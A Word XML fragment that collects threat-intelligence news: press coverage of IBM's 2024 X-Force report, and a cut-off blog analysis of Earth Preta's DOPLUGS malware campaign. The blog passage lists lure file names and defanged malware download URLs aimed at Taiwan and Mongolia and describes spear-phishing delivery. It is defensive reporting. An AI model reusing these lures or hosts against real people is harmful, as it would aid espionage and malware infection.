          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>ACKNOWLEDGEMENTS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California Joint Regional Intelligence Center (JRIC, CA) and Israel National Cyber Directorate (INCD) contributed to this CSA. VERSION HISTORY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February 29, 2024: Initial version.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product is provided subject to this Notification and this Privacy &amp; Use policy.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Cybersecurity and Infrastructure Security Agency 2024.02.29 17:54</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-060a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>IBM Report: Manufacturing Becomes Top Targeted for Cyber Attacks in Asia Pacific, as Critical Infrastructure Globally Sees Increased Targeting</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Manila Standard Business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February 29, 2024, 4:18 pm</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Advertisement - Nearly 70% of attacks globally targeted critical infrastructure Globally, attacks caused by exploiting identity increased by 71%, highlighting the need for stronger user access and control strategies in organizations The most targeted countries in Asia Pacific include Japan (80%) and Australia (11%)</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IBM has released the 2024 X-Force Threat Intelligence Index, revealing the manufacturing sector as the most-targeted industry in Asia-Pacific for the second year in a row, accounting for 46% of the incidents. While Europe accounted for most attacks on the transportation industry globally in the previous year, Asia Pacific surpassed it in 2023 as it experienced 63% of attacks against transportation entities. Notably, the study also showed how Asia-Pacific was the third most-targeted geography in 2023, accounting for 23% of incidents responded to globally.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IBM X-Force, IBM Consulting's offensive and defensive security services arm, phishing and exploitation of public-facing applications were the most common initial access vectors observed in the region for 2023. However, amid the spike of identity-based attacks that emerged globally, organizations in the region should practice vigilance and focus on strengthening their user access controls as cybercriminals see more opportunities to "log in" versus hacking into corporate networks through valid accounts.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X-Force Threat Intelligence Index is based on insights and observations from monitoring over 150 billion security events per day in more than 130 countries. In addition, data is gathered and analyzed from multiple sources within IBM, including IBM X-Force Threat Intelligence, Incident Response, X- Force Red, IBM Managed Security Services, and data provided from Red Hat Insights and Intezer, which contributed to the 2024 report.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other key findings in Asia-Pacific region include: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 At the industry level, manufacturing was the most-targeted in the region (46%); followed by finance and insurance, and transportation industries, which tied for second place, accounting for 12% of cases each; and education was third at 8%.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>* Phishing persisted as the top initial access vector in the region, with 36% of incidents in 2023, closely followed by exploitation of public-facing applications at 35%. The use of valid accounts, abuse of trusted relationship and replication through removable media all tied for third, each caused 12% of incidents observed.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>* Once again, malware was the most observed action representing 45% of attacks in Asia-Pacific. Ransomware led those incidents accounting for 17%, and infostealers followed at 10%. Backdoors which accounted for 31% in 2022, made up only 3% of cases in 2023.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>* The most common impact observed in attacks on the region were brand reputation and data theft at 27% each. Extortion, data destruction and data leak followed, all accounted for 20% of cases.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Advertisement -</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"Although 'AI-engineered attacks' are receiving more attention due to the rise of generative AI in the current landscape, the biggest security threat in Asia Pacific remains to be known unpatched vulnerabilities. Additional focus should also be placed on the region's critical infrastructure and key industries such as manufacturing, finance and insurance, and transportation, with stress tests and well-prepared incidents response plans in place", said Catherine Lian, General Manager &amp; Technology Leader, IBM ASEAN. "The exploitation of user identity is becoming a preferred weapon of choice for global threat actors, raising the need for more effective user access control strategies in the region, and is prompting us to promote a holistic approach to security in the age of generative AI."</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study also unveils key global highlights, which include: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Global Identity Crisis Poised to Worsen Exploiting valid accounts has become the path of least resistance for cybercriminals, with billions of compromised credentials accessible on the Dark Web today. In 2023, X-Force saw attackers increasingly invest in operations to obtain users' identities globally - with a 266% uptick in infostealing malware, designed to steal personal identifiable information like emails, social media and messaging app credentials, banking details, crypto wallet data and more.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"easy entry" for attackers is one that's harder to detect, eliciting a costly response from enterprises. According to X-Force, major incidents caused by attackers using valid accounts were associated to nearly 200% more complex response measures by security teams than the average incident - with defenders needing to distinguish between legitimate and malicious user activity on the network. In fact, IBM's 2023 Cost of a Data Breach Report found that breaches caused by stolen or compromised credentials required roughly 11 months to detect and recover from - the longest response lifecycle than any other infection vector.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wide reach into users' online activity was evident in the FBI and European law enforcement's April 2023 takedown of a global cybercrime forum that collected the login details of more than 80 million user accounts. Identity-based threats will likely continue to grow as adversaries leverage generative AI to optimize their attacks. Already in 2023, X-Force observed over 800,000 posts on AI and GPT across Dark Web forums, reaffirming these innovations have caught cybercriminals attention and interest.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Adversaries "Log into" Critical Infrastructure Networks Worldwide, nearly 70% of attacks that X-Force responded to were against critical infrastructure organizations, an alarming finding highlighting that cybercriminals are wagering on these high value targets' need for uptime to advance their objectives.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Nearly 85% of attacks that X-Force responded to on this sector were caused by exploiting public-facing applications, phishing emails, and the use of valid accounts. The latter poses an increased risk to the sector, with DHS CISA stating that the majority of successful attacks on government agencies, critical infrastructure organizations and state-level government bodies in 2022 involved the use of valid accounts. This highlights the need for these organizations to frequently stress test their environments for potential exposures and develop incident response plans.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Generative AI - The Next Big Frontier to Secure For cybercriminals to see ROI from their campaigns, the technologies they target must be ubiquitous across most organizations worldwide. Just as past technological enablers fostered cybercriminal activities - as observed with ransomware and Windows Server's market dominance, BEC scams and Microsoft 365 dominance or cryptojacking and the Infrastructure-as-a-Service market consolidation - this pattern will most likely extend across AI.</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X-Force assesses that once generative AI market dominance is established - where a single technology approaches 50% market share or when the market consolidates to three or less technologies - it could trigger the maturity of AI as an attack surface, mobilizing further investment in new tools from cybercriminals. Although generative AI is currently in its pre-mass market stage, it's paramount that enterprises secure their AI models before cybercriminals scale their activity. Enterprises should also recognize that their existing underlying infrastructure is a gateway to their AI models that doesn't require novel tactics from attackers to target - highlighting the need for a holistic approach to security in the age of generative AI, as outlined in the IBM Framework for Securing Generative AI</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Additional findings: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Everyone is vulnerable - Red Hat Insights found that 92% of customers have at least one CVE with known exploits unaddressed in their environment at the time of scanning, while 80% of the top ten vulnerabilities detected across systems in 2023 were given a 'High' or 'Critical' CVSS base severity score.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"Kerberoasting" pays off - X-Force observed a 100% increase in "kerberoasting" attacks, wherein attackers attempt to impersonate users to escalate privileges by abusing Microsoft Active Directory tickets.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Security misconfigurations - X-Force Red penetration testing engagements indicate that security misconfigurations accounted for 30% of total exposures identified, observing more than 140 ways that attackers can exploit misconfigurations.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Download a copy of the 2024 X-Force Threat Intelligence Index here: https://www.ibm.com/account/reg/us-en/signup?formid=urx-52629</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Advertisement -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Manila Standard 2024.02.29 12:10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://manilastandard.net/business/314421322/ibm-report-manufacturing-becomes-top-targeted-for-cyber-attacks-in-asia-pacific-as-critical-infrastructure-globally-sees-increased-targeting.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>The old, not the new: Basic security issues still biggest threat to enterprises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2023, cybercriminals saw more opportunities to "log in" versus hack into corporate networks through valid accounts - making this tactic a preferred weapon for threat actors, according to IBM's 2024 X-Force Threat Intelligence Index.</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Attacks on critical infrastructure reveal industry faux pas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nearly 85% of attacks on critical sectors, compromise could have been mitigated with patching, MFA, or least-privilege principals - indicating that what the security industry historically described as "basic security" may be harder to achieve than portrayed.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Ransomware attacks on enterprises saw a nearly 12% drop last year, as larger organizations opt against paying and decrypting, in favor of rebuilding their infrastructure. With this growing pushback likely to impact adversaries' revenue expectations from encryption-based extortion, groups that previously specialized in ransomware were observed pivoting to infostealers.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X-Force analysis projects that when a single generative AI technology approaches 50% market share or when the market consolidates to three or less technologies, it could trigger at-scale attacks against these platforms.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‘security fundamentals' doesn't get as many head turns as ‘AI-engineered attacks,' it remains that enterprises' biggest security problem boils down to the basic and known - not the novel and unknown" said Charles Henderson, Global Managing Partner, IBM Consulting, and Head of IBM X-Force. "Identity is being used against enterprises time and time again, a problem that will worsen as adversaries invest in AI to optimize the tactic." A global identity crisis poised to worsen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Exploiting valid accounts has become the path of least resistance for cybercriminals, with billions of compromised credentials accessible on the dark web today. In 2023, X-Force saw attackers increasingly invest in operations to obtain users' identities - with a 266% uptick in infostealing malware, designed to steal personal identifiable information like emails, social media and messaging app credentials, banking details, crypto wallet data and more.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"easy entry" for attackers is one that's harder to detect, eliciting a costly response from enterprises. According to X-Force, major incidents caused by attackers using valid accounts were associated to nearly 200% more complex response measures by security teams than the average incident - with defenders needing to distinguish between legitimate and malicious user activity on the network.</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fact, IBM's 2023 Cost of a Data Breach Report found that breaches caused by stolen or compromised credentials required roughly 11 months to detect and recover from - the longest response lifecycle than any other infection vector.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wide reach into users' online activity was evident in the FBI and European law enforcement's April 2023 takedown of a global cybercrime forum that collected the login details of more than 80 million user accounts. Identity-based threats will likely continue to grow as adversaries leverage generative AI to optimize their attacks. Already in 2023, X-Force observed over 800,000 posts on AI and GPT across dark web forums, reaffirming these innovations have caught cybercriminals attention and interest. Adversaries "log into" critical infrastructure networks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Worldwide, nearly 70% of attacks that X-Force responded to were against critical infrastructure organizations, an alarming finding highlighting that cybercriminals are wagering on these high value targets' need for uptime to advance their objectives.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Nearly 85% of attacks that X-Force responded to on this sector were caused by exploiting public-facing applications, phishing emails, and the use of valid accounts. The latter poses an increased risk to the sector, with DHS CISA stating that the majority of successful attacks on government agencies, critical infrastructure organizations and state-level government bodies in 2022 involved the use of valid accounts. This highlights the need for these organizations to frequently stress test their environments for potential exposures and develop incident response plans.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cybercriminals to see ROI from their campaigns, the technologies they target must be ubiquitous across most organizations worldwide. Just as past technological enablers fostered cybercriminal activities - as observed with ransomware and Windows Server's market dominance, BEC scams and Microsoft 365 dominance or cryptojacking and the Infrastructure-as-a-Service market consolidation - this pattern will most likely extend across AI.</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X-Force assesses that once generative AI market dominance is established - where a single technology approaches 50% market share or when the market consolidates to three or less technologies - it could trigger the maturity of AI as an attack surface, mobilizing further investment in new tools from cybercriminals.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Although generative AI is currently in its pre-mass market stage, it's paramount that enterprises secure their AI models before cybercriminals scale their activity. Enterprises should also recognize that their existing underlying infrastructure is a gateway to their AI models that doesn't require novel tactics from attackers to target - highlighting the need for a holistic approach to security in the age of generative AI. Where did all the phish go?</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Nearly one in three attacks observed worldwide targeted Europe, with the region also experiencing the most ransomware attacks globally (26%).</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Despite remaining a top infection vector, phishing attacks saw a 44% decrease in volume from 2022. But with AI poised to optimize this attack and X-Force research indicating that AI can speed up attacks by nearly two days, the infection vector will remain a preferred choice for cybercriminals.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Red Hat Insights found that 92% of customers have at least one CVE with known exploits unaddressed in their environment at the time of scanning, while 80% of the top ten vulnerabilities detected across systems in 2023 were given a ‘high' or ‘critical' CVSS base severity score.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X-Force observed a 100% increase in "kerberoasting" attacks, wherein attackers attempt to impersonate users to escalate privileges by abusing Microsoft Active Directory tickets.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X-Force Red penetration testing engagements indicate that security misconfigurations accounted for 30% of total exposures identified, observing more than 140 ways that attackers can exploit misconfigurations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Help Net Security 2024.02.23 08:54</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.helpnetsecurity.com/2024/02/23/2024-x-force-threat-intelligence-index/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>IBM Report: Identity Comes Under Attack, Straining Enterprises' Recovery Time from Breaches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News provided by IBM</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21 Feb, 2024, 00:00 ET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-71% spike in cyberattacks caused by exploiting identity - 50% AI market share milestone to trigger a cyber problem - Nearly 70% of attacks globally targeted critical infrastructure in 2023 - Europe feels brunt of cyberattacks, making up 32% of global incidents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CAMBRIDGE, Mass., Feb. 21, 2024 /PRNewswire/ - IBM (NYSE: IBM) today released the 2024 X-Force Threat Intelligence Index highlighting an emerging global identity crisis as cybercriminals double down on exploiting user identities to compromise enterprises worldwide. According to IBM X- Force, IBM Consulting's offensive and defensive security services arm, in 2023, cybercriminals saw more opportunities to "log in" versus hack into corporate networks through valid accounts - making this tactic a preferred weapon of choice for threat actors.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IBM x-force Threat Intelligence Index 2024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X-Force Threat Intelligence Index is based on insights and observations from monitoring over 150 billion security events per day in more than 130 countries. In addition, data is gathered and analyzed from multiple sources within IBM, including IBM X-Force Threat Intelligence, Incident Response, X- Force Red, IBM Managed Security Services, and data provided from Red Hat Insights and Intezer , which contributed to the 2024 report.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of the key highlights include: Attacks on critical infrastructure reveal industry "faux pas." In nearly 85% of attacks on critical sectors, compromise could have been mitigated with patching, multi-factor authentication, or least-privilege principals - indicating that what the security industry historically described as "basic security" may be harder to achieve than portrayed.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Ransomware groups pivot to leaner business model. Ransomware attacks on enterprises saw a nearly 12% drop last year, as larger organizations opt against paying and decrypting, in favor of rebuilding their infrastructure. With this growing pushback likely to impact adversaries' revenue expectations from encryption-based extortion, groups that previously specialized in ransomware were observed pivoting to infostealers.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>ROI from attacks on generative AI not there - yet. X-Force analysis projects that when a single generative AI technology approaches 50% market share or when the market consolidates to three or less technologies, it could trigger at-scale attacks against these platforms.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'security fundamentals' doesn't get as many head turns as 'AI- engineered attacks,' it remains that enterprises' biggest security problem boils down to the basic and known - not the novel and unknown" said Charles Henderson, Global Managing Partner, IBM Consulting, and Head of IBM X- Force. "Identity is being used against enterprises time and time again, a problem that will worsen as adversaries invest in AI to optimize the tactic."</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Global Identity Crisis Poised to Worsen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Exploiting valid accounts has become the path of least resistance for cybercriminals, with billions of compromised credentials accessible on the Dark Web today. In 2023, X-Force saw attackers increasingly invest in operations to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>obtain users' identities - with a 266% uptick in infostealing malware, designed to steal personal identifiable information like emails, social media and messaging app credentials, banking details, crypto wallet data and more.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"easy entry" for attackers is one that's harder to detect, eliciting a costly response from enterprises. According to X-Force, major incidents caused by attackers using valid accounts were associated to nearly 200% more complex response measures by security teams than the average incident - with defenders needing to distinguish between legitimate and malicious user activity on the network. In fact, IBM's 2023 Cost of a Data Breach Report found that breaches caused by stolen or compromised credentials required roughly 11 months to detect and recover from - the longest response lifecycle than any other infection vector.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wide reach into users' online activity was evident in the FBI and European law enforcement's April 2023 takedown of a global cybercrime forum that collected the login details of more than 80 million user accounts. Identity-based threats will likely continue to grow as adversaries leverage generative AI to optimize their attacks. Already in 2023, X-Force observed over 800,000 posts on AI and GPT across Dark Web forums, reaffirming these innovations have caught cybercriminals attention and interest.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Adversaries "Log into" Critical Infrastructure Networks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Worldwide, nearly 70% of attacks that X-Force responded to were against critical infrastructure organizations, an alarming finding highlighting that cybercriminals are wagering on these high value targets' need for uptime to advance their objectives.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Nearly 85% of attacks that X-Force responded to on this sector were caused by exploiting public-facing applications, phishing emails, and the use of valid accounts. The latter poses an increased risk to the sector, with DHS CISA stating that the majority of successful attacks on government agencies, critical infrastructure organizations and state-level government bodies in 2022 involved the use of valid accounts. This highlights the need for these organizations to frequently stress test their environments for potential exposures and develop incident response plans.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Generative AI - The Next Big Frontier to Secure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cybercriminals to see ROI from their campaigns, the technologies they target must be ubiquitous across most organizations worldwide. Just as past technological enablers fostered cybercriminal activities - as observed with ransomware and Windows Server's market dominance, BEC scams and Microsoft 365 dominance or cryptojacking and the Infrastructure-as-a-Service market consolidation - this pattern will most likely extend across AI.</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X-Force assesses that once generative AI market dominance is established - where a single technology approaches 50% market share or when the market consolidates to three or less technologies - it could trigger the maturity of AI as an attack surface, mobilizing further investment in new tools from cybercriminals. Although generative AI is currently in its pre-mass market stage, it's paramount that enterprises secure their AI models before cybercriminals scale their activity. Enterprises should also recognize that their existing underlying infrastructure is a gateway to their AI models that doesn't require novel tactics from attackers to target - highlighting the need for a holistic approach to security in the age of generative AI, as outlined in the IBM Framework for Securing Generative AI.</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Additional findings: Europe - adversaries' preferred target -- Nearly one in three attacks observed worldwide targeted Europe, with the region also experiencing the most ransomware attacks globally (26%).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Where did all the phish go? Despite remaining a top infection vector, phishing attacks saw a 44% decrease in volume from 2022. But with AI poised to optimize this attack and X-Force research indicating that AI can speed up attacks by nearly two days, the infection vector will remain a preferred choice for cybercriminals.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Everyone is vulnerable - Red Hat Insights found that 92% of customers have at least one CVE with known exploits unaddressed in their environment at the time of scanning, while 80% of the top ten vulnerabilities detected across systems in 2023 were given a 'High' or 'Critical' CVSS base severity score.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>"Kerberoasting" pays off - X-Force observed a 100% increase in "kerberoasting" attacks, wherein attackers attempt to impersonate users to escalate privileges by abusing Microsoft Active Directory tickets.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Security misconfigurations - X-Force Red penetration testing engagements indicate that security misconfigurations accounted for 30% of total exposures identified, observing more than 140 ways that attackers can exploit misconfigurations.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Additional Resources Download a copy of the 2024 X-Force Threat Intelligence Index.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Read more about the report's top findings in this IBM Security Intelligence blog. Sign up for the 2024 IBM X-Force Threat Intelligence webinar on Thursday, March 7th at 11:00 am ET.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Connect with the IBM X-Force team for a personalized review of the findings.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Media Contact Georgia Prassinos IBM [email protected]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SOURCE IBM</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>PR Newswire 2024.02.21 07:16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.prnewswire.com/news-releases/ibm-report-identity-comes-under-attack-straining-enterprises-recovery-time-from-breaches-302066462.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Earth Preta Campaign Uses DOPLUGS to Target Asia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In this blog entry, we focus on Earth Preta's campaign that employed a variant of the DOPLUGS malware to target Asian countries.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Sunny Lu, Pierre Lee February 20, 2024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Subscribe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Introduction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July 2023, Check Point disclosed a campaign called SMUGX, which focused on European countries and was attributed to the advanced persistent threat (APT) group Earth Preta (also known as Mustang Panda and Bronze President). In the same year, we obtained a phishing email targeting the Taiwanese government that contained a piece of customized PlugX malware - the same one used in the SMUGX campaign. As most previous discussions from other researchers focus on the European attacks, we would instead like to shed light on the Asian side of the campaign. After months of investigation, we discovered more SMUGX campaign-related samples targeting not only Taiwan, but also Vietnam, Malaysia, and other Asian countries in 2022 and 2023.</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kind of customized PlugX malware has been active since 2022, with related research being published by Secureworks, Recorded Future, Check Point, and Lab52. During analysis, we observed that the piece of customized PlugX malware is dissimilar to the general type of the PlugX malware that contains a completed backdoor command module, and that the former is only used for downloading the latter. Due to its different functionality, we decided to give this piece of customized PlugX malware a new name: DOPLUGS.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Upon investigation, we found that the DOPLUGS malware uses the KillSomeOne module, a USB worm that was first disclosed by a Sophos report in November 2020. However, an entry from January 2020 mentioned a USB worm; this entry was also the first report that analyzed a piece of PlugX malware integrated with KillSomeOne behavior.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this blog entry, we focus on the Earth Preta campaign, providing an analysis of the DOPLUGS malware variant that the group used, including backdoor command behavior, integration with the KillSomeOne module, and its evolution. Decoys and victims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Based on noteworthy DOPLUGS files we've found since July 2023 (Table 1), we can determine that the victims, at least for the attacks that employed these specific samples, are from Taiwan and Mongolia. Based on the file names, it seems the files used for social engineering were related to current events, such as the Taiwanese presidential election that occurred in January 2024.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VT submission date LNK file name Download link in the LNK file MSI file File name 7-Jul-23 ер усны сэрэмжллэг.lnk ("Flood warning" in Mongolian) https://estmongolia[.]com/ер усны сэрэмжллэг 5f5c3b.msi OneNoteM.exe msi.dll NoteLogger.dat ер усны сэрэмжллэг.pdf Aug. 17, 2023 .lnk ("Election poll research questionnaire" in traditional Chinese) https://getfiledown[.]com/utdkt N/A N/A N/A Aug. 18, 2023 .lnk ("Explanation of Urban Renewal Initiative for Residential Development in Phases Two to Five of Shuiyuan Road" in traditional Chinese https://getfiledown[.]com/vgbskgyu 6460c7.msi OneNoteM.exe msi.dll NoteLogger.dat .pdf Sept. 9, 2023 .lnk Mate: A Thoughtful Consideration" in traditional Chinese) https://getfilefox[.]com/enmjgwvt enmjgwvt OneNoteM.exe .pdf</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 Noteworthy DOPLUGS files, with some referencing the 2024 Taiwan elections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content of the decoy file .pdf is related to an urban renewal project in Taiwan (written in traditional Chinese).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 The decoy document ".pdf"</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download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decoy file ер усны сэрэмжллэг.pdf involves a flood warning in Mongolia, written in Mongolian.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2. The decoy document "ер усны сэрэмжллэг.pdf"</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download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Looking at VirusTotal data (targeting Asia) from 2022 to 2023, we observed that perpetrators of the campaign primarily targeted Taiwan and Vietnam, with lower counts from other Asian countries like China, Singapore, Hon Kong, Japan, India, Malaysia, and Mongolia.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3. Submission count of DOPLUGS on VirusTotal in Asia.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download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Spear-phishing emails as Initial Access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spear-phishing emails sent to victims are embedded with a Google Drive link that hosts a password-protected archive file, which will download DOPLUGS malware. Figure 4 shows a sample email.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4. Screenshot of a spear-phishing email containing a message regarding the 